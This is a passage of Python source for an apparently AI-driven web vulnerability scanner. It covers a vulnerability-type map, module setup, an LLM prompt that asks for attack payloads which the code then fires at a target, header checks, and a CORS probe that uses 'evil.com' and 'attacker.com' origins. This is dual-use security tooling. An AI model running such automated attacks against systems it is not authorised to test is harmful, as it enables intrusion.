"file_upload", "arbitrary_file_read": "arbitrary_file_read", "arbitrary_file_delete": "arbitrary_file_delete", "zip_slip": "zip_slip", # Request Forgery (4) "ssrf": "ssrf", "ssrf_cloud": "ssrf_cloud", "csrf": "csrf", "cors_misconfig": "cors_misconfig", # Auth (8) "auth_bypass": "auth_bypass", "jwt_manipulation": "jwt_manipulation", "session_fixation": "session_fixation", "weak_password": "weak_password", "default_credentials": "default_credentials", "brute_force": "brute_force", "two_factor_bypass": "two_factor_bypass", "oauth_misconfiguration": "oauth_misconfiguration", # Authorization (6) "idor": "idor", "bola": "bola", "bfla": "bfla", "privilege_escalation": "privilege_escalation", "mass_assignment": "mass_assignment", "forced_browsing": "forced_browsing", # Client-Side (8) "clickjacking": "clickjacking", "open_redirect": "open_redirect", "dom_clobbering": "dom_clobbering", "postmessage_vulnerability": "postmessage_vulnerability", "websocket_hijacking": "websocket_hijacking", "prototype_pollution": "prototype_pollution", "css_injection": "css_injection", "tabnabbing": "tabnabbing", # Infrastructure (10) "security_headers": "security_headers", "ssl_issues": "ssl_issues", "http_methods": "http_methods", "directory_listing": "directory_listing", "debug_mode": "debug_mode", "exposed_admin_panel": "exposed_admin_panel", "exposed_api_docs": "exposed_api_docs", "insecure_cookie_flags": "insecure_cookie_flags", "http_smuggling": "http_smuggling", "cache_poisoning": "cache_poisoning", # Logic & Data (16) "race_condition": "race_condition", "business_logic": "business_logic", "rate_limit_bypass": "rate_limit_bypass", "parameter_pollution": "parameter_pollution", "type_juggling": "type_juggling", "insecure_deserialization": "insecure_deserialization", "subdomain_takeover": "subdomain_takeover", "host_header_injection": "host_header_injection", "timing_attack": "timing_attack", "improper_error_handling": "improper_error_handling", "sensitive_data_exposure": 
"sensitive_data_exposure", "information_disclosure": "information_disclosure", "api_key_exposure": "api_key_exposure", "source_code_disclosure": "source_code_disclosure", "backup_file_exposure": "backup_file_exposure", "version_disclosure": "version_disclosure", # Crypto & Supply (8) "weak_encryption": "weak_encryption", "weak_hashing": "weak_hashing", "weak_random": "weak_random", "cleartext_transmission": "cleartext_transmission", "vulnerable_dependency": "vulnerable_dependency", "outdated_component": "outdated_component", "insecure_cdn": "insecure_cdn", "container_escape": "container_escape", # Cloud & API (9) "s3_bucket_misconfiguration": "s3_bucket_misconfiguration", "cloud_metadata_exposure": "cloud_metadata_exposure", "serverless_misconfiguration": "serverless_misconfiguration", "graphql_introspection": "graphql_introspection", "graphql_dos": "graphql_dos", "rest_api_versioning": "rest_api_versioning", "soap_injection": "soap_injection", "api_rate_limiting": "api_rate_limiting", "excessive_data_exposure": "excessive_data_exposure", } def __init__( self, target: str, mode: OperationMode = OperationMode.FULL_AUTO, log_callback: Optional[Callable] = None, progress_callback: Optional[Callable] = None, auth_headers: Optional[Dict] = None, task: Optional[Any] = None, custom_prompt: Optional[str] = None, recon_context: Optional[Dict] = None, finding_callback: Optional[Callable] = None, lab_context: Optional[Dict] = None, scan_id: Optional[str] = None, enable_kali_sandbox: bool = False, loaded_custom_prompts: Optional[List[Dict]] = None, preferred_provider: Optional[str] = None, preferred_model: Optional[str] = None, methodology_file: Optional[str] = None, enable_cli_agent: bool = False, cli_agent_provider: Optional[str] = None, selected_md_agents: Optional[List[str]] = None, ): self.target = self._normalize_target(target) self.mode = mode self.log = log_callback or self._default_log self.progress_callback = progress_callback self.finding_callback = finding_callback 
self.auth_headers = auth_headers or {} self.task = task self.custom_prompt = custom_prompt self.recon_context = recon_context self.lab_context = lab_context or {} self.scan_id = scan_id self.enable_kali_sandbox = enable_kali_sandbox self.loaded_custom_prompts: List[Dict] = loaded_custom_prompts or [] self.preferred_provider = preferred_provider self.preferred_model = preferred_model self.enable_cli_agent = enable_cli_agent self.cli_agent_provider = cli_agent_provider self.selected_md_agents: Optional[List[str]] = selected_md_agents self._cancelled = False self._paused = False self._skip_to_phase: Optional[str] = None # Phase skip target self.session: Optional[aiohttp.ClientSession] = None self.llm = LLMClient( preferred_provider=preferred_provider, preferred_model=preferred_model, ) # VulnEngine integration (100 types, 428 payloads, 100 testers) self.vuln_registry = VulnerabilityRegistry() self.payload_generator = PayloadGenerator() self.response_verifier = ResponseVerifier() self.knowledge_base = self._load_knowledge_base() # PoC generator for confirmed findings from backend.core.poc_generator import PoCGenerator self.poc_generator = PoCGenerator() # Validation pipeline: negative controls + proof of execution + confidence scoring self.negative_controls = NegativeControlEngine() self.proof_engine = ProofOfExecution() self.confidence_scorer = ConfidenceScorer() self.validation_judge = ValidationJudge( self.negative_controls, self.proof_engine, self.confidence_scorer, self.llm, access_control_learner=getattr(self, 'access_control_learner', None) ) # Execution history for cross-scan learning try: from backend.core.execution_history import ExecutionHistory self.execution_history = ExecutionHistory() except Exception: self.execution_history = None # Access control learning engine (adapts from BOLA/BFLA/IDOR outcomes) try: self.access_control_learner = AccessControlLearner() except Exception: self.access_control_learner = None # Adaptive learner (cross-scan TP/FP 
feedback learning) self.adaptive_learner = None if HAS_ADAPTIVE_LEARNER: try: self.adaptive_learner = AdaptiveLearner() except Exception: pass # RAG Engine: semantic retrieval + few-shot examples + reasoning memory self.rag_engine = None self.few_shot_selector = None self.reasoning_memory = None if HAS_RAG and os.getenv("ENABLE_RAG", "true").lower() != "false": try: rag_backend = os.getenv("RAG_BACKEND", "auto") self.rag_engine = RAGEngine(data_dir="data", backend=rag_backend) self.few_shot_selector = FewShotSelector(rag_engine=self.rag_engine) self.reasoning_memory = ReasoningMemory() except Exception as e: logger.warning(f"RAG init failed: {e}") # External methodology loader (injects into all LLM calls) self.methodology_index = None _meth_file = methodology_file or os.getenv("METHODOLOGY_FILE") if _meth_file and os.path.exists(_meth_file): try: from backend.core.methodology_loader import MethodologyLoader _loader = MethodologyLoader() self.methodology_index = _loader.load_from_file(_meth_file) if self.loaded_custom_prompts: db_idx = _loader.load_from_db_prompts(self.loaded_custom_prompts) self.methodology_index = _loader.merge_indices( self.methodology_index, db_idx) except Exception as e: logger.warning(f"Methodology loader init failed: {e}") elif self.loaded_custom_prompts: try: from backend.core.methodology_loader import MethodologyLoader _loader = MethodologyLoader() self.methodology_index = _loader.load_from_db_prompts( self.loaded_custom_prompts) except Exception: pass # Pass methodology index to validation judge if self.methodology_index: self.validation_judge.methodology_index = self.methodology_index # Autonomy modules (lazy-init after session in __aenter__) self.request_engine = None self.waf_detector = None self.strategy = None self.chain_engine = ChainEngine(llm=self.llm) self.auth_manager = None self._waf_result = None # Phase 1: Token budget + Reasoning engine self.token_budget = None if HAS_TOKEN_BUDGET and os.getenv("TOKEN_BUDGET"): 
self.token_budget = TokenBudget( total_budget=int(os.getenv("TOKEN_BUDGET", "100000")) ) self.reasoning_engine = None if HAS_REASONING and os.getenv("ENABLE_REASONING", "true").lower() == "true": self.reasoning_engine = ReasoningEngine(self.llm, self.token_budget) self.task_manager = None if HAS_AGENT_TASKS: self.task_manager = AgentTaskManager() # Phase 2: Endpoint classifier, CVE hunter, Deep recon, Banner analyzer self.endpoint_classifier = EndpointClassifier() if HAS_ENDPOINT_CLASSIFIER else None self.cve_hunter = None # Lazy-init after session self.deep_recon = None # Lazy-init after session self.banner_analyzer = BannerAnalyzer() if HAS_BANNER_ANALYZER else None # Phase 3: Payload mutator, Param analyzer, XSS validator self.payload_mutator = PayloadMutator() if HAS_PAYLOAD_MUTATOR else None self.param_analyzer = ParameterAnalyzer() if HAS_PARAM_ANALYZER else None self.xss_validator = XSSValidator() if HAS_XSS_VALIDATOR else None # Phase 3.5: Request repeater, Site analyzer self.request_repeater = RequestRepeater() if HAS_REQUEST_REPEATER else None self.site_analyzer = SiteAnalyzer() if HAS_SITE_ANALYZER else None # Phase 4: Exploit generator, PoC validator self.exploit_generator = ExploitGenerator() if HAS_EXPLOIT_GENERATOR else None self.poc_validator_engine = None # Lazy-init after session # Phase 5: Multi-agent orchestrator (optional replacement for 3-stream) self._orchestrator = None # Lazy-init after session # Phase 5.5: MD-based agent orchestrator (post-recon dispatch) self._md_orchestrator = None # Lazy-init after session # Researcher AI (0-day discovery with Kali sandbox, opt-in) self._researcher = None # Lazy-init after session # Phase 6: Per-vuln-type agent orchestrator (opt-in via ENABLE_VULN_AGENTS) self._vuln_orchestrator = None # Phase 7: Checkpoint persistence self._checkpoint_manager = ( CheckpointManager(self.scan_id) if HAS_CHECKPOINT and self.scan_id else None ) self._last_progress = 0 self._last_phase = "" # Data storage self.recon = 
ReconData() self.memory = AgentMemory() self._site_architecture = None # SiteAnalyzer architecture analysis result self.custom_prompts: List[str] = [] self.tool_executions: List[Dict] = [] self.rejected_findings: List[Finding] = [] self._sandbox = None # Lazy-init sandbox reference for tool runner self.container_status: Optional[Dict] = None # Container telemetry @property def findings(self) -> List[Finding]: """Backward-compatible access to confirmed findings via memory""" return self.memory.confirmed_findings def cancel(self): """Cancel the agent execution""" self._cancelled = True self._paused = False # Unpause so cancel is immediate if self._vuln_orchestrator: self._vuln_orchestrator.cancel() def is_cancelled(self) -> bool: """Check if agent was cancelled""" return self._cancelled def pause(self): """Pause the agent execution""" self._paused = True def resume(self): """Resume the agent execution""" self._paused = False def is_paused(self) -> bool: """Check if agent is paused""" return self._paused async def _wait_if_paused(self): """Block while paused, checking for cancel every second""" while self._paused and not self._cancelled: await asyncio.sleep(1) def _save_checkpoint(self): """Save current state for crash-resilient resume.""" if not self._checkpoint_manager: return try: state = { "target": self.target, "mode": self.mode, "scan_type": self.scan_type, "progress": self._last_progress, "phase": self._last_phase, "recon_data": { "endpoints": [ {"url": e.url, "method": e.method, "params": e.params} for e in self.recon.endpoints[:50] ], "technologies": list(self.recon.technologies), "forms": self.recon.forms[:20] if hasattr(self.recon, 'forms') else [], }, "findings": [ { "title": f.title, "vuln_type": f.vulnerability_type, "severity": f.severity, "endpoint": f.endpoint, "confidence_score": getattr(f, 'confidence_score', 0), } for f in self.findings ], "rejected_count": len(self.rejected_findings), "junior_tested_types": list(getattr(self, 
def _save_checkpoint(self):
    """Save current state for crash-resilient resume.

    Serializes a bounded snapshot (first 50 endpoints, 20 forms, all
    confirmed findings) through the CheckpointManager. No-op when no
    checkpoint manager was configured; all errors are swallowed so
    checkpointing can never abort a scan.
    """
    if not self._checkpoint_manager:
        return
    try:
        state = {
            "target": self.target,
            "mode": self.mode,
            # NOTE(review): self.scan_type is not set in the visible __init__;
            # presumably assigned elsewhere before the first checkpoint — verify.
            "scan_type": self.scan_type,
            "progress": self._last_progress,
            "phase": self._last_phase,
            "recon_data": {
                "endpoints": [
                    {"url": e.url, "method": e.method, "params": e.params}
                    for e in self.recon.endpoints[:50]
                ],
                "technologies": list(self.recon.technologies),
                "forms": self.recon.forms[:20] if hasattr(self.recon, 'forms') else [],
            },
            "findings": [
                {
                    "title": f.title,
                    "vuln_type": f.vulnerability_type,
                    "severity": f.severity,
                    "endpoint": f.endpoint,
                    "confidence_score": getattr(f, 'confidence_score', 0),
                }
                for f in self.findings
            ],
            "rejected_count": len(self.rejected_findings),
            "junior_tested_types": list(getattr(self, '_junior_tested_types', set())),
        }
        self._checkpoint_manager.save(state)
    except Exception:
        pass  # Never block scan flow

async def _vuln_agent_ws_broadcast(self, message: Dict):
    """Broadcast vuln agent status updates via WebSocket.

    Best-effort: silently does nothing without a scan_id or when the
    WebSocket manager is unavailable.
    """
    if self.scan_id:
        try:
            from backend.api.websocket import manager as ws_manager
            await ws_manager.send_to_scan(self.scan_id, message)
        except Exception:
            pass

def _build_test_targets(self) -> List[Dict]:
    """Build test target list from recon data (shared by sequential and orchestrated paths).

    Returns dicts of {url, method, params[, original_url, form_defaults]}:
    query-string endpoints first (capped at 20), then forms (capped at 10),
    then a common-parameter fallback when nothing was discovered. The main
    target is always appended last.
    """
    test_targets = []
    # Endpoints with parameters
    for endpoint in self.recon.endpoints[:20]:
        url = _get_endpoint_url(endpoint)
        parsed = urlparse(url)
        base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
        if parsed.query:
            params = list(parse_qs(parsed.query).keys())
            test_targets.append({
                "url": base_url,
                "method": "GET",
                "params": params,
                "original_url": url,
            })
        elif url in self.recon.parameters:
            # No query string, but recon recorded parameters for this URL.
            test_targets.append({
                "url": url,
                "method": "GET",
                "params": self.recon.parameters[url],
            })
    # Forms
    for form in self.recon.forms[:10]:
        # Preserve pre-filled input values so submissions stay valid.
        form_defaults = {}
        for detail in form.get('input_details', []):
            name = detail.get('name', '')
            if name and detail.get('value'):
                form_defaults[name] = detail['value']
        test_targets.append({
            "url": form['action'],
            "method": form['method'],
            "params": form.get('inputs', []),
            "form_defaults": form_defaults,
        })
    # Fallback: common params
    if not test_targets:
        for endpoint in self.recon.endpoints[:5]:
            test_targets.append({
                "url": _get_endpoint_url(endpoint),
                "method": "GET",
                "params": ["id", "q", "search", "page", "file", "url", "cat", "artist", "item"],
            })
    # Always include main target
    test_targets.append({
        "url": self.target,
        "method": "GET",
        "params": ["id", "q", "search", "page", "file", "url", "path", "redirect", "cat", "item"],
    })
    return test_targets

# Phase ordering for skip-to-phase support
AGENT_PHASES = ["recon", "analysis", "testing", "enhancement", "completed"]

def skip_to_phase(self, target_phase: str) -> bool:
    """Signal the agent to skip to a given phase.

    Returns False (and does nothing) for unknown phase names; otherwise
    records the request, which _check_skip consumes at the next checkpoint.
    """
    if target_phase not in self.AGENT_PHASES:
        return False
    self._skip_to_phase = target_phase
    return True
the agent to skip to a given phase""" if target_phase not in self.AGENT_PHASES: return False self._skip_to_phase = target_phase return True def _check_skip(self, current_phase: str) -> Optional[str]: """Check if we should skip to a phase ahead of current_phase""" target = self._skip_to_phase if not target: return None try: cur_idx = self.AGENT_PHASES.index(current_phase) tgt_idx = self.AGENT_PHASES.index(target) except ValueError: return None if tgt_idx > cur_idx: self._skip_to_phase = None return target self._skip_to_phase = None return None def _map_vuln_type(self, vuln_type: str) -> str: """Map agent vuln type name to VulnEngine registry key""" return self.VULN_TYPE_MAP.get(vuln_type, vuln_type) def _get_payloads(self, vuln_type: str) -> List[str]: """Get payloads from VulnEngine PayloadGenerator""" mapped = self._map_vuln_type(vuln_type) payloads = self.payload_generator.payload_libraries.get(mapped, []) if not payloads: # Try original name payloads = self.payload_generator.payload_libraries.get(vuln_type, []) return payloads @staticmethod def _load_knowledge_base() -> Dict: """Load vulnerability knowledge base JSON at startup""" kb_path = Path(__file__).parent.parent.parent / "data" / "vuln_knowledge_base.json" try: with open(kb_path, "r") as f: return json.load(f) except Exception: return {} async def add_custom_prompt(self, prompt: str): """Add a custom prompt to be processed""" self.custom_prompts.append(prompt) await self.log_llm("info", f"[USER PROMPT RECEIVED] {prompt}") # Process immediately if LLM is available if self.llm.is_available(): await self._process_custom_prompt(prompt) async def _process_custom_prompt(self, prompt: str): """Process a custom user prompt with the LLM and execute requested tests. Detects CVE references and vulnerability test requests, then ACTUALLY tests them against the target instead of just providing AI text responses. 
""" await self.log_llm("info", f"[AI] Processing user prompt: {prompt}") # Detect CVE references in prompt cve_match = re.search(r'CVE-\d{4}-\d{4,}', prompt, re.IGNORECASE) cve_id = cve_match.group(0).upper() if cve_match else None # Build context about available endpoints endpoints_info = [] for ep in self.recon.endpoints[:20]: endpoints_info.append(f"- {_get_endpoint_method(ep)} {_get_endpoint_url(ep)}") params_info = [] for param, values in list(self.recon.parameters.items())[:15]: params_info.append(f"- {param}: {values[:3]}") forms_info = [] for form in self.recon.forms[:10]: forms_info.append(f"- {form.get('method', 'GET')} {form.get('action', 'N/A')} fields={form.get('inputs', [])[:5]}") # Enhanced system prompt that requests actionable test plans system_prompt = f"""You are a senior penetration tester performing ACTIVE TESTING against {self.target}. The user wants you to ACTUALLY TEST for vulnerabilities, not just explain them. {'The user is asking about ' + cve_id + '. Research this CVE and generate specific test payloads.' if cve_id else ''} Current reconnaissance data: Target: {self.target} Endpoints ({len(self.recon.endpoints)} total): {chr(10).join(endpoints_info[:10]) if endpoints_info else ' None discovered yet'} Parameters ({len(self.recon.parameters)} total): {chr(10).join(params_info[:10]) if params_info else ' None discovered yet'} Forms ({len(self.recon.forms)} total): {chr(10).join(forms_info[:5]) if forms_info else ' None discovered yet'} Technologies detected: {', '.join(self.recon.technologies) if self.recon.technologies else 'None'} CRITICAL: You must respond with a TEST PLAN in JSON format. The agent will EXECUTE these tests. 
Available injection points: "parameter", "header", "cookie", "body", "path" Available vuln types: xss_reflected, xss_stored, sqli_error, sqli_union, sqli_blind, sqli_time, command_injection, ssti, lfi, rfi, path_traversal, ssrf, xxe, crlf_injection, header_injection, host_header_injection, open_redirect, csrf, nosql_injection, idor, cors_misconfig Respond in this JSON format: {{ "analysis": "What the user is asking and your security assessment", "action": "test_cve|test_endpoint|test_parameter|scan_for|analyze|info", "vuln_type": "primary vulnerability type to test", "injection_point": "parameter|header|cookie|body|path", "header_name": "X-Forwarded-For", "payloads": ["payload1", "payload2", "payload3"], "targets": ["specific URLs to test"], "vuln_types": ["list of vuln types if scanning for multiple"], "response": "Brief explanation shown to the user" }} For CVE testing, include at least 5 specific payloads based on the CVE's attack vector. Always set action to "test_cve" or "test_endpoint" when the user asks to test something.""" # Append anti-hallucination directives system_prompt += "\n\n" + self._get_enhanced_system_prompt("testing") try: response = await self.llm.generate(prompt, system=system_prompt) if not response: await self.log_llm("warning", "[AI] No response from LLM") return await self.log_llm("info", f"[AI] Analyzing request and building test plan...") import json try: json_match = re.search(r'\{[\s\S]*\}', response) if json_match: action_data = json.loads(json_match.group()) action = action_data.get("action", "info") targets = action_data.get("targets", []) vuln_types = action_data.get("vuln_types", []) vuln_type = action_data.get("vuln_type", "") injection_point = action_data.get("injection_point", "parameter") header_name = action_data.get("header_name", "") payloads = action_data.get("payloads", []) ai_response = action_data.get("response", response) await self.log_llm("info", f"[AI] {ai_response[:300]}") # ── CVE Testing: Actually execute tests 
── if action == "test_cve": await self.log_llm("info", f"[AI] Executing CVE test plan: {vuln_type} via {injection_point}") await self._execute_cve_test( cve_id or "CVE-unknown", vuln_type, injection_point, header_name, payloads, targets ) elif action == "test_endpoint" and targets: await self.log_llm("info", f"[AI] Testing {len(targets)} endpoints...") for target_url in targets[:5]: if payloads and vuln_type: # Use AI-generated payloads with correct injection await self._execute_targeted_test( target_url, vuln_type, injection_point, header_name, payloads ) else: await self._test_custom_endpoint(target_url, vuln_types or ["xss_reflected", "sqli_error"]) elif action == "test_parameter" and targets: await self.log_llm("info", f"[AI] Testing parameters: {targets}") await self._test_custom_parameters(targets, vuln_types or ["xss_reflected", "sqli_error"]) elif action == "scan_for" and vuln_types: await self.log_llm("info", f"[AI] Scanning for: {vuln_types}") for vtype in vuln_types[:5]: await self._scan_for_vuln_type(vtype) elif action == "analyze": await self.log_llm("info", f"[AI] Analysis complete") else: await self.log_llm("info", f"[AI] Response provided - no active test needed") else: await self.log_llm("info", f"[AI RESPONSE] {response[:1000]}") except json.JSONDecodeError: await self.log_llm("info", f"[AI RESPONSE] {response[:1000]}") except Exception as e: await self.log_llm("error", f"[AI] Error processing prompt: {str(e)}") async def _test_custom_endpoint(self, url: str, vuln_types: List[str]): """Test a specific endpoint for vulnerabilities""" if not self.session: return await self.log("info", f" Testing endpoint: {url}") try: # Parse URL to find parameters parsed = urlparse(url) params = parse_qs(parsed.query) if not params: # Try adding common parameters params = {"id": ["1"], "q": ["test"]} for param_name in list(params.keys())[:3]: for vtype in vuln_types[:2]: payloads = self._get_payloads(vtype)[:2] for payload in payloads: await 
self._test_single_param(url, param_name, payload, vtype) except Exception as e: await self.log("debug", f" Error testing {url}: {e}") async def _test_custom_parameters(self, param_names: List[str], vuln_types: List[str]): """Test specific parameters across known endpoints""" endpoints_with_params = [ ep for ep in self.recon.endpoints if any(p in str(ep) for p in param_names) ] if not endpoints_with_params: # Use all endpoints that have parameters endpoints_with_params = self.recon.endpoints[:10] for ep in endpoints_with_params[:5]: url = _get_endpoint_url(ep) for param in param_names[:3]: for vtype in vuln_types[:2]: payloads = self._get_payloads(vtype)[:2] for payload in payloads: await self._test_single_param(url, param, payload, vtype) async def _execute_cve_test(self, cve_id: str, vuln_type: str, injection_point: str, header_name: str, payloads: List[str], targets: List[str]): """Execute actual CVE testing with AI-generated payloads against the target.""" await self.log("warning", f" [CVE TEST] Testing {cve_id} ({vuln_type}) via {injection_point}") # Build test targets: use AI-suggested URLs or fall back to discovered endpoints test_urls = targets[:5] if targets else [] if not test_urls: test_urls = [self.target] for ep in self.recon.endpoints[:10]: ep_url = _get_endpoint_url(ep) if ep_url and ep_url not in test_urls: test_urls.append(ep_url) # Also use payloads from the PayloadGenerator as fallback all_payloads = list(payloads[:10]) registry_payloads = self._get_payloads(vuln_type)[:5] for rp in registry_payloads: if rp not in all_payloads: all_payloads.append(rp) findings_count = 0 for test_url in test_urls[:5]: if self.is_cancelled(): return await self.log("info", f" [CVE TEST] Testing {test_url[:60]}...") for payload in all_payloads[:10]: if self.is_cancelled(): return # Use correct injection method if injection_point == "header": test_resp = await self._make_request_with_injection( test_url, "GET", payload, injection_point="header", header_name=header_name 
or "X-Forwarded-For" ) param_name = header_name or "X-Forwarded-For" elif injection_point in ("body", "cookie", "path"): parsed = urlparse(test_url) params = list(parse_qs(parsed.query).keys()) if parsed.query else ["data"] test_resp = await self._make_request_with_injection( test_url, "POST" if injection_point == "body" else "GET", payload, injection_point=injection_point, param_name=params[0] if params else "data" ) param_name = params[0] if params else "data" else: # parameter parsed = urlparse(test_url) params = list(parse_qs(parsed.query).keys()) if parsed.query else ["id", "q"] param_name = params[0] if params else "id" test_resp = await self._make_request_with_injection( test_url, "GET", payload, injection_point="parameter", param_name=param_name ) if not test_resp: continue # Verify the response is_vuln, evidence = await self._verify_vulnerability( vuln_type, payload, test_resp, None ) if is_vuln: evidence = f"[{cve_id}] {evidence}" finding = self._create_finding( vuln_type, test_url, param_name, payload, evidence, test_resp, ai_confirmed=True ) finding.title = f"{cve_id} - {finding.title}" finding.references.append(f"https://nvd.nist.gov/vuln/detail/{cve_id}") await self._add_finding(finding) findings_count += 1 await self.log("warning", f" [CVE TEST] {cve_id} CONFIRMED at {test_url[:50]}") break # One finding per URL is enough if findings_count == 0: await self.log("info", f" [CVE TEST] {cve_id} not confirmed after testing {len(test_urls)} targets with {len(all_payloads)} payloads") else: await self.log("warning", f" [CVE TEST] {cve_id} found {findings_count} vulnerable endpoint(s)") async def _execute_targeted_test(self, url: str, vuln_type: str, injection_point: str, header_name: str, payloads: List[str]): """Execute targeted vulnerability tests with specific payloads and injection point.""" await self.log("info", f" [TARGETED] Testing {vuln_type} via {injection_point} at {url[:60]}") for payload in payloads[:10]: if self.is_cancelled(): return parsed = 
urlparse(url) params = list(parse_qs(parsed.query).keys()) if parsed.query else ["id"] param_name = params[0] if params else "id" if injection_point == "header": param_name = header_name or "X-Forwarded-For" test_resp = await self._make_request_with_injection( url, "GET", payload, injection_point=injection_point, param_name=param_name, header_name=header_name ) if not test_resp: continue is_vuln, evidence = await self._verify_vulnerability( vuln_type, payload, test_resp, None ) if is_vuln: finding = self._create_finding( vuln_type, url, param_name, payload, evidence, test_resp, ai_confirmed=True ) await self._add_finding(finding) await self.log("warning", f" [TARGETED] {vuln_type} confirmed at {url[:50]}") return await self.log("info", f" [TARGETED] {vuln_type} not confirmed at {url[:50]}") async def _scan_for_vuln_type(self, vuln_type: str): """Scan all endpoints for a specific vulnerability type""" await self.log("info", f" Scanning for {vuln_type.upper()} vulnerabilities...") vuln_lower = vuln_type.lower() # Handle header-based vulnerabilities (no payloads needed) if vuln_lower in ["clickjacking", "x-frame-options", "csp", "hsts", "headers", "security headers", "missing headers"]: await self._test_security_headers(vuln_lower) return # Handle CORS testing if vuln_lower in ["cors", "cross-origin"]: await self._test_cors() return # Handle information disclosure if vuln_lower in ["info", "information disclosure", "version", "technology"]: await self._test_information_disclosure() return # Standard payload-based testing payloads = self._get_payloads(vuln_type)[:3] if not payloads: # Try AI-based testing for unknown vuln types await self._ai_test_vulnerability(vuln_type) return for ep in self.recon.endpoints[:10]: url = _get_endpoint_url(ep) for param in list(self.recon.parameters.keys())[:5]: for payload in payloads: await self._test_single_param(url, param, payload, vuln_type) async def _test_security_headers(self, vuln_type: str): """Test for security header 
async def _test_security_headers(self, vuln_type: str):
    """Test for security header vulnerabilities like clickjacking.

    Checks X-Frame-Options / CSP frame-ancestors, HSTS (HTTPS only),
    X-Content-Type-Options and CSP presence on the main target plus up to
    five discovered endpoints. Findings are deduplicated per domain: repeat
    hits only extend the existing finding's affected_urls.
    Note: `vuln_type` names the user-requested check but every header is
    inspected regardless — the parameter is not consulted below.
    """
    await self.log("info", f" Testing security headers...")
    # Test main target and key pages
    test_urls = [self.target]
    for ep in self.recon.endpoints[:5]:
        url = _get_endpoint_url(ep) if isinstance(ep, dict) else ep
        if url and url not in test_urls:
            test_urls.append(url)
    for url in test_urls:
        if self.is_cancelled():
            return
        try:
            async with self.session.get(url, allow_redirects=True, timeout=self._get_request_timeout()) as resp:
                headers = dict(resp.headers)
                # Case-insensitive lookup: HTTP header names vary in casing.
                headers_lower = {k.lower(): v for k, v in headers.items()}
                findings = []
                # Check X-Frame-Options (Clickjacking)
                x_frame = headers_lower.get("x-frame-options", "")
                csp = headers_lower.get("content-security-policy", "")
                if not x_frame and "frame-ancestors" not in csp.lower():
                    findings.append({
                        "type": "clickjacking",
                        "title": "Missing Clickjacking Protection",
                        "severity": "medium",
                        "description": "The page lacks X-Frame-Options header and CSP frame-ancestors directive, making it vulnerable to clickjacking attacks.",
                        "evidence": f"X-Frame-Options: Not set\nCSP: {csp[:100] if csp else 'Not set'}",
                        "remediation": "Add 'X-Frame-Options: DENY' or 'X-Frame-Options: SAMEORIGIN' header, or use 'frame-ancestors' in CSP."
                    })
                # Check HSTS
                hsts = headers_lower.get("strict-transport-security", "")
                if not hsts and url.startswith("https"):
                    findings.append({
                        "type": "missing_hsts",
                        "title": "Missing HSTS Header",
                        "severity": "low",
                        "description": "HTTPS site without Strict-Transport-Security header, vulnerable to protocol downgrade attacks.",
                        "evidence": "Strict-Transport-Security: Not set",
                        "remediation": "Add 'Strict-Transport-Security: max-age=31536000; includeSubDomains' header."
                    })
                # Check X-Content-Type-Options
                if "x-content-type-options" not in headers_lower:
                    findings.append({
                        "type": "missing_xcto",
                        "title": "Missing X-Content-Type-Options Header",
                        "severity": "low",
                        "description": "Missing nosniff header allows MIME-sniffing attacks.",
                        "evidence": "X-Content-Type-Options: Not set",
                        "remediation": "Add 'X-Content-Type-Options: nosniff' header."
                    })
                # Check CSP
                if not csp:
                    findings.append({
                        "type": "missing_csp",
                        "title": "Missing Content-Security-Policy Header",
                        "severity": "low",
                        "description": "No Content-Security-Policy header, increasing XSS risk.",
                        "evidence": "Content-Security-Policy: Not set",
                        "remediation": "Implement a restrictive Content-Security-Policy."
                    })
                # Create findings (non-AI: detected by header inspection)
                # Domain-scoped dedup: only 1 finding per domain for header issues
                # NOTE: loop variable `f` shadows the f-string-unrelated name; harmless but worth renaming someday.
                for f in findings:
                    mapped = self._map_vuln_type(f["type"])
                    vt = f["type"]
                    # Check if we already have this finding for this domain
                    if self.memory.has_finding_for(vt, url):
                        # Append URL to existing finding's affected_urls
                        for ef in self.memory.confirmed_findings:
                            if ef.vulnerability_type == vt:
                                if url not in ef.affected_urls:
                                    ef.affected_urls.append(url)
                                break
                        continue
                    finding = Finding(
                        id=hashlib.md5(f"{vt}{url}".encode()).hexdigest()[:8],
                        title=self.vuln_registry.get_title(mapped) or f["title"],
                        severity=self.vuln_registry.get_severity(mapped) or f["severity"],
                        vulnerability_type=vt,
                        cvss_score=self._get_cvss_score(vt),
                        cvss_vector=self._get_cvss_vector(vt),
                        cwe_id=self.vuln_registry.get_cwe_id(mapped) or "CWE-693",
                        description=self.vuln_registry.get_description(mapped) or f["description"],
                        affected_endpoint=url,
                        evidence=f["evidence"],
                        remediation=self.vuln_registry.get_remediation(mapped) or f["remediation"],
                        affected_urls=[url],
                        ai_verified=False  # Detected by inspection, not AI
                    )
                    await self._add_finding(finding)
        except Exception as e:
            await self.log("debug", f" Header test error: {e}")
misconfigurations""" await self.log("info", f" Testing CORS configuration...") test_origins = [ "https://evil.com", "https://attacker.com", "null" ] for url in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:3]]: if not url: continue for origin in test_origins: try: headers = {"Origin": origin} async with self.session.get(url, headers=headers) as resp: acao = resp.headers.get("Access-Control-Allow-Origin", "") acac = resp.headers.get("Access-Control-Allow-Credentials", "") if acao == origin or acao == "*": # Domain-scoped dedup for CORS if self.memory.has_finding_for("cors_misconfig", url): for ef in self.memory.confirmed_findings: if ef.vulnerability_type == "cors_misconfig": if url not in ef.affected_urls: ef.affected_urls.append(url) break break severity = "high" if acac.lower() == "true" else "medium" finding = Finding( id=hashlib.md5(f"cors{url}{origin}".encode()).hexdigest()[:8], title=self.vuln_registry.get_title("cors_misconfig") or f"CORS Misconfiguration - {origin}", severity=severity, vulnerability_type="cors_misconfig", cvss_score=self._get_cvss_score("cors_misconfig"), cvss_vector=self._get_cvss_vector("cors_misconfig"), cwe_id=self.vuln_registry.get_cwe_id("cors_misconfig") or "CWE-942", description=self.vuln_registry.get_description("cors_misconfig") or f"The server reflects the Origin header '{origin}' in Access-Control-Allow-Origin.", affected_endpoint=url, evidence=f"Origin: {origin}\nAccess-Control-Allow-Origin: {acao}\nAccess-Control-Allow-Credentials: {acac}", remediation=self.vuln_registry.get_remediation("cors_misconfig") or "Configure CORS to only allow trusted origins.", affected_urls=[url], ai_verified=False # Detected by inspection, not AI ) await self._add_finding(finding) await self.log("warning", f" [FOUND] CORS misconfiguration at {url[:50]}") break except: pass async def _test_information_disclosure(self): """Test for information disclosure""" await self.log("info", f" Testing for information disclosure...") 
async def _test_information_disclosure(self):
    """Flag version-disclosing response headers (Server, X-Powered-By).

